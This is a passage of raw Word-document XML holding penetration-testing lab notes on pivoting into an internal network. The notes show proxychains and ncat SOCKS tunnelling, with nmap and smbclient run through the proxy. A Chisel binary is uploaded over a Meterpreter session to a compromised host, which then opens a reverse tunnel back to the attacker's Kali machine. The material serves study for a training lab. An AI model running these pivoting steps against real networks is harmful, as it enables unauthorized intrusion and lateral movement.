      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To do that, you need to create a tunnel from your Kali to that SOCKS proxy. Here’s how:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Option 1: SSH-style proxy use with ncat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -o ProxyCommand="ncat --proxy-type socks5 --proxy 192.168.50.63:1080 %h %p" database_admin@10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AD9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Option 2: Configure proxychains to use CONFLUENCE01 as proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ADA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ADB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Edit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/proxychains.conf:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ADC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ADD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[ProxyList]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ADE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 192.168.50.63 1080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000ADF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains nmap -Pn -p22,445,3389 10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains smbclient -L 10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A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E6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_as51w6jlo0lp" w:id="92"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tunneling using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical usage of Chisel for reverse port forwarding can be seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId227">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 It was used, but it didn't actually help towards getting flag. Still helpful to see being used in real life</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (27.4.2. Services and Sessions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For context, this is a continuation of the enumeration from the "</w:t>
      </w:r>
      <w:hyperlink w:anchor="_1driqwbpvfv8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Set up SOCKS5 Proxy to access internal network</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section </w:t>
      </w:r>
    </w:p>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While we could use the SOCKS5 proxy and proxychains to browse to the open port on 172.16.6.241, we'll use</w:t>
      </w:r>
      <w:hyperlink r:id="rId228">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId229">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it provides a more stable and interactive browser session. From the</w:t>
      </w:r>
      <w:hyperlink r:id="rId230">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId231">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">releases page</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we download the Windows and Linux amd64 versions and extract the binaries in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/beyond/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="772"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">amd64 just means 64-bit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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t xml:space="preserve">On our Kali machine, we'll use Chisel in server mode to receive incoming connections on port 8080. In addition, we'll add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option to allow </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a type of tunneling. Like regular port forwarding is another type of tunneling).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="502" name="image489.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image489.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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AF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod a+x chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="776"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"a" means all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="776"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"x" means execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="776"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Everyone can execute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./chisel server -p 8080 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, we'll transfer the extracted </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary to CLIENTWK1 (a compromised system) by using Meterpreter's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1854200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="479" name="image474.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image474.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23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AFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload chisel.exe C:\\Users\\marcus\\chisel.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and utilize Chisel in client mode to connect back to our Kali machine on port 8080. We'll create a reverse port forward with the syntax </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R:localport:remotehost:remoteport</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In our case, the remote host and port are 172.16.6.241 (target machine in the internal network we want to access port 80 of) and 80. The local port we want to utilize is 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1130300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65" name="image73.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image73.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId234"/>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B03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="273"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="273"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the local IP is implicit here, since we didn't include it, so it defaults to 127.0.0.1. If we wanted explicit, it would be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="273"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe client 192.168.119.5:8080 R:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
